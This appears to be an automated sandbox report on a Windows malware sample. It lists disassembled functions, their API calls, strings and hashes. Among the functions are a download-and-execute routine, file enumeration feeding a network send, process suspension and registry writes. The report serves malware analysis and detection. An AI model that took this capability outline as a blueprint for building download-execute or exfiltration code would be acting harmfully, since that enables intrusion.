                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                        • String ID:
                                        • API String ID: 745075371-0
                                        • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                        • Instruction ID: 411f265c59fe6ea8e7a4a7f389aa671ff947d679512e0c94986e3a05ae8bdf1c
                                        • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                        • Instruction Fuzzy Hash: 4951B331900205ABDB20EFA5CC41BBF73B8AF05306F14456BFD11DB262D7789948CB69
                                        Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00407A91
                                        • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstH_prologNext
                                        • String ID:
                                        • API String ID: 1157919129-0
                                        • Opcode ID: e8fc1aae19a95acc5e5ba4988fa9a3d6b6627a504d1d70c366dbdaaaee21e51e
                                        • Instruction ID: 8d2d5af9b240bd76912c5a42ed9d01478aca41623b4ca31e05b92188a1ecdcc3
                                        • Opcode Fuzzy Hash: e8fc1aae19a95acc5e5ba4988fa9a3d6b6627a504d1d70c366dbdaaaee21e51e
                                        • Instruction Fuzzy Hash: EE5172329041089ACB14FBA5DD969ED7778AF50318F50017EB806B31D2EF3CAB498B99
                                        Function 0044801F Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                                        • _free.LIBCMT ref: 00448077
                                          • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A), ref: 00446AEB
                                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(0000000A,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A,0000000A), ref: 00446AFD
                                        • _free.LIBCMT ref: 00448243
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                        • String ID:
                                        • API String ID: 1286116820-0
                                        • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                        • Instruction ID: 9f73030e0ab81e705d7e97d576e5185c64763d3f00745452c155363557a16cba
                                        • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                        • Instruction Fuzzy Hash: 97512A718002099BE714EF69CC829BF77BCEF44364F11026FE454A32A1EB389E46CB58
                                        Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                        Strings
                                        • open, xrefs: 0040622E
                                        • C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, xrefs: 0040627F, 004063A7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DownloadExecuteFileShell
                                        • String ID: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe$open
                                        • API String ID: 2825088817-2811046045
                                        • Opcode ID: b67075259e0bd929e0ab264c94f4d1ca59ca1de50cdaeebcdd70e2622b8f7750
                                        • Instruction ID: ed092bbb38966d98691ab8c1252c2e533cce500cde7a5ae80e96292b959be8c1
                                        • Opcode Fuzzy Hash: b67075259e0bd929e0ab264c94f4d1ca59ca1de50cdaeebcdd70e2622b8f7750
                                        • Instruction Fuzzy Hash: AC61A231604340A7CA14FA76C8569BE77A69F81718F00493FBC46772E6EF3C9A05C69B
                                        Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                        • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileFind$FirstNextsend
                                        • String ID: x@G$x@G
                                        • API String ID: 4113138495-3390264752
                                        • Opcode ID: 21733312e49eae253e2bcb47d9c134556802c5ae893f427082e78e5a185c5d5d
                                        • Instruction ID: 69ed09b71aae528489a15fdfe73527b1f784865601dfee234b785914c9021214
                                        • Opcode Fuzzy Hash: 21733312e49eae253e2bcb47d9c134556802c5ae893f427082e78e5a185c5d5d
                                        • Instruction Fuzzy Hash: 4D2147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                        Function 0041BB87 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                        Download Yara Rule
                                        APIs
                                        • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                          • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                          • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                          • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateInfoParametersSystemValue
                                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                        • API String ID: 4127273184-3576401099
                                        • Opcode ID: 3d360fdf2e78990b0619b3c2804760803c56fcbcebbcac8b827f4f8c51bc1c9b
                                        • Instruction ID: f939710b15fdea32ddc266fac7b70a3034aa980cea7cdc9a443a85228e3c1b8e
                                        • Opcode Fuzzy Hash: 3d360fdf2e78990b0619b3c2804760803c56fcbcebbcac8b827f4f8c51bc1c9b
                                        • Instruction Fuzzy Hash: 69113332B8060433D514343A4E6FBAE1806D756B60FA4015FF6026A7DAFB9E4AE103DF
                                        Function 00450A8F Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,00000000,?,0043B965,00000000,00000000), ref: 00446ED3
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F47
                                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443D03,?,?,?,?,?,?,00000004), ref: 00450B71
                                        • _wcschr.LIBVCRUNTIME ref: 00450C01
                                        • _wcschr.LIBVCRUNTIME ref: 00450C0F
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443D03,00000000,00443E23), ref: 00450CB2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                        • String ID:
                                        • API String ID: 4212172061-0
                                        • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                        • Instruction ID: 5c43a781d12153ba09aec0d98fe41cbdfc67d130b552f984b55d9713d4fa54bc
                                        • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                        • Instruction Fuzzy Hash: 8C613C39600306AAD729AB35CC42AAB7398EF05316F14052FFD05D7283E778ED49C769
                                        Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00408DAC
                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileFind$FirstH_prologNext
                                        • String ID:
                                        • API String ID: 301083792-0
                                        • Opcode ID: ba71cde6abd387c0af899193430974a98498f8e11ae542d92e598f3d86220441
                                        • Instruction ID: f05055f275ce1a6697326a6dce2c5e98ec7bccfbf1b509f624b4afbba7a31620
                                        • Opcode Fuzzy Hash: ba71cde6abd387c0af899193430974a98498f8e11ae542d92e598f3d86220441
                                        • Instruction Fuzzy Hash: 08714F728001199BCB15EBA1DC919EE7778AF54318F10427FE846B71E2EF386E45CB98
                                        Function 00450E7A Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,00000000,?,0043B965,00000000,00000000), ref: 00446ED3
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F47
                                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F3B
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450ECE
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F1F
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FDF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorInfoLastLocale$_free$_abort
                                        • String ID:
                                        • API String ID: 2829624132-0
                                        • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                        • Instruction ID: f4db154689a757c669ee29d9ad80dc5f2d25de97e2fa36f56d0a3b4566e2e889
                                        • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                        • Instruction Fuzzy Hash: 5261B3359002079BEB289F24CC82B7A77A8EF04706F1041BBED05C6696E77CD989DB58
                                        Function 0043A66D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043A765
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0043A76F
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 0043A77C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                        • Instruction ID: 91e5dab5071ea2c3d468f992cf6309450941867bc48944ec1b7f80ed58ec6f75
                                        • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                        • Instruction Fuzzy Hash: 4A31D27494132CABCB21DF24D98979DBBB8AF08310F5051EAE80CA7261E7349F81CF49
                                        Function 00442564 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?,0044253A,?,0046DAE0,0000000C,00442691,?,00000002,00000000), ref: 00442585
                                        • TerminateProcess.KERNEL32(00000000,?,0044253A,?,0046DAE0,0000000C,00442691,?,00000002,00000000), ref: 0044258C
                                        • ExitProcess.KERNEL32 ref: 0044259E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                        • Instruction ID: c44577b837509f0b32c3b0b508549cfe19acceb0599f6adc3fd698849a85d96e
                                        • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                        • Instruction Fuzzy Hash: 68E08C31004208BFEF016F10EE19A8D3F29EF14382F448475F8098A232CB79DD82CB88
                                        Function 0041ACD1 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACDC
                                        • NtSuspendProcess.NTDLL(00000000), ref: 0041ACE9
                                        • CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACF2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CloseHandleOpenSuspend
                                        • String ID:
                                        • API String ID: 1999457699-0
                                        • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                        • Instruction ID: 2f9544719979d624048292b5ab27ab43be47c8216fe5e38c5e6db7c07fdef43b
                                        • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                        • Instruction Fuzzy Hash: 36D0A733505132638221176A7C0CC87EE6CDFC1EB37024136F805C3220DE30C88186F4
                                        Function 0041ACFD Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041AD08
                                        • NtResumeProcess.NTDLL(00000000), ref: 0041AD15
                                        • CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD1E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CloseHandleOpenResume
                                        • String ID:
                                        • API String ID: 3614150671-0
                                        • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                        • Instruction ID: 37c2ac379339410306f7c92c5038f8fbeac8a1766455cc2515cdfea107740f35
                                        • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                        • Instruction Fuzzy Hash: 3AD05E32504121638220176A7C0C887EEA9DBC5AB37024236F804C26219A24C841C6A4
                                        Function 0044D5F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: .
                                        • API String ID: 0-248832578
                                        • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                        • Instruction ID: 7b9f70a4ed7410ef06f95e01b7d5f23a490d2b0eff2bca8ad8bf22ff3bb6f1ff
                                        • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                        • Instruction Fuzzy Hash: 65310371C00209AFEB249E79CC84EEB7BBDDB86318F1501AEF91997351E6389E418B54
                                        Function 004475A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475FA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID: GetLocaleInfoEx
                                        • API String ID: 2299586839-2904428671
                                        • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                        • Instruction ID: 2e67eb2aa2785e7236de0a8104ca96919387e7076f6eaa21777fcb5c897bf932
                                        • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                        • Instruction Fuzzy Hash: F8F0F031A44308BBDB11AF61DC06F6E7B25EF04722F10016AFC042A292CF399E11969E
                                        Function 00440E30 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
